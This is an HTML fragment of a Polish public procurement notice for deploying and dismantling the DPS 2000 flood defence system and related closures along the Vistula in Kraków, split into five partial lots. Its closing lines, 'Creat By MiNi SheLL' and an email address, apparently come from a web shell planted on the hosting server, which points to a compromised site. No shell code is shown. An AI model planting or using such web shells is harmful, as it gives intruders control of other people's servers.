sytuacji polegania przez Wykonawcę na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów 9. W przypadku osób fizycznych oświadczenie, że wyrażają zgodę na uczestnictwo w realizacji przedmiotu zamówienia po stronie Wykonawcy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany postanowień niniejszej umowy wymagają zgody obu stron wyrażonej w formie pisemnej pod rygorem nieważności (aneks). 
2.	Z zastrzeżeniem formy przewidzianej w ust. 1, Strony dopuszczają możliwość zmiany postanowień umowy w następujących przypadkach:
a)	zmiany w KRS lub wpisie do ewidencji działalności gospodarczej w trakcie realizacji zamówienia, dotyczące Wykonawcy;
b)	zmiany kont bankowych,
c)	zmiany formy zabezpieczenia należytego wykonania umowy zgodnie z art. 149 ustawy Prawo zamówień publicznych;
d)	wystąpienia oczywistych omyłek pisarskich  i rachunkowych w treści umowy.
e)	zmiany stawki podatku VAT, która następuje z mocy prawa.
f)	obniżenia wynagrodzenia, o którym mowa §6 ust.6
g)	zmian technicznych i technologicznych (roboty zamienne)
h)	zmian regulacji prawnych obowiązujących w dniu podpisania umowy
i)	zgodnie z art.144 ust.1 ustawy Prawo zamówień publicznych - dopuszcza się możliwość wprowadzania innych, nieistotnych, zmian postanowień niniejszej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.
j)zmiany harmonogramu rzeczowo - finansowego w sytuacji wystąpienia okoliczności niezależnych od Wykonawcy i udokumentowanych w formie pisemnej a mających wpływ na harmonogram</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzmiuw.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie zamawiającego Inspektorat Rejonowy w Krakowie ul.Kraszewskiego 36 pok.32A..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2012 godzina 08:00, miejsce: w siedzibie zamawiającego Inspektorat Rejonowy w Krakowie ul.Kraszewskiego 36 pok.32A..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Oferta Częściowa nr 1
Rozwinięcie i likwidacja systemu DPS 2000 na prawym brzegu rzeki Wisły od ul. Czechosłowackiej do początku bulwaru powyżej mostu Dębnickiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rozwinięcie i likwidacja systemu DPS 2000 na prawym brzegu rzeki Wisły od ul. Czechosłowackiej do początku bulwaru powyżej mostu Dębnickiego
w krakowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.34.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 04.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Oferta Częściowa nr 2
Rozwinięcie i likwidacja systemu DPS 2000 na lewym brzegu rzeki Wisły
a/ od ujścia rz. Rudawy do mostu Dębnickiego 
b/ od mostu Dębnickiego do Wawelu
c/ pomiędzy Wawelem a mostem Grunwaldzkim
d/ pomiędzy mostem Grunwaldzkim do bulwaru przy 
ul. Piekarskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Oferta Częściowa nr 2
Rozwinięcie i likwidacja systemu DPS 2000 na lewym brzegu rzeki Wisły
a/ od ujścia rz. Rudawy do mostu Dębnickiego 
b/ od mostu Dębnickiego do Wawelu
c/ pomiędzy Wawelem a mostem Grunwaldzkim
d/ pomiędzy mostem Grunwaldzkim do bulwaru przy 
ul. Piekarskiej
w Krakowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.34.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Oferta Częściowa nr 3
Zamknięcie i demontaż zamknięcia mostu Dębnickiego przy pomocy gabionów oraz zamknięcie workami z piaskiem i rozbiórka  lokalnego obniżenia terenu  przy ul. Przedwiośnie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Oferta Częściowa nr 3
Zamknięcie i demontaż zamknięcia mostu Dębnickiego przy pomocy gabionów oraz zamknięcie workami z piaskiem i rozbiórka  lokalnego obniżenia terenu  przy ul. Przedwiośnie 

w Krakowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.34.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 04.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Oferta Częściowa nr 4
Zamknięcie i demontaż zamknięć bram powodziowych
- przy ul. Wioślarskiej, Flisackiej, Dojazdowej i Włóczków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Oferta Częściowa nr 4
Zamknięcie i demontaż zamknięć bram powodziowych
- przy ul. Wioślarskiej, Flisackiej, Dojazdowej i Włóczków 

w krakowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.34.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Oferta Częściowa nr 5
Założenie , montaż i demontaż znaków ostrzegawczych i tablic informacyjnych niezbędnych w sytuacji zamknięcia mostu Dębnickiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Oferta Częściowa nr 5
Założenie , montaż i demontaż znaków ostrzegawczych i tablic informacyjnych niezbędnych w sytuacji zamknięcia mostu Dębnickiego
w Krakowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.34.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com